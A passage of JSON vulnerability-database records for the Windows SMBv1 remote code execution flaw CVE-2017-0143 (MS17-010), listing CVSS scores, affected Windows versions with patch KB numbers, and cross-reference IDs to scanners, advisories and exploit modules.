"SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": 
["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-06T16:54:11", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-06T16:54:11", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB4013429", "KB4012213", "KB4012217", "KB4012216", "KB4012214", "KB3210721", "KB3213986", "KBMS16-110, 3187754", "KB3177186", "KB4013198", "KB4012606", "KB3210720", "KB4012212", "KB3212646", "KB3205401", "KB4012598", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": 
""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows 
Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", 
"kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", 
"msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": 
"KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T16:54:11", "differentElements": ["msAffectedSoftware"], "edition": 17}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-06T18:45:07", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 
"RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-06T18:45:07", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-06T18:45:07", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB4012598", "KB4012214", "KB3210720", "KB4012216", "KB4012212", "KBMS16-110, 3187754", "KB4013198", "KB4012213", "KB3205409", "KB3177186", "KB3212646", "KB3205401", "KB4012215", "KB3210721", "KB4012217", "KB4012606", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 
R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 
2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T18:45:07", "differentElements": ["msAffectedSoftware"], "edition": 18}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-07T08:44:10", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": 
["KLA11902", "KLA10977", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-07T08:44:10", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-07T08:44:10", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012213", "KB4012215", "KB3212646", "KB4013198", "KB4012598", "KB3210720", "KB3210721", "KB4012214", "KB3205401", "KB4012606", "KB4012216", 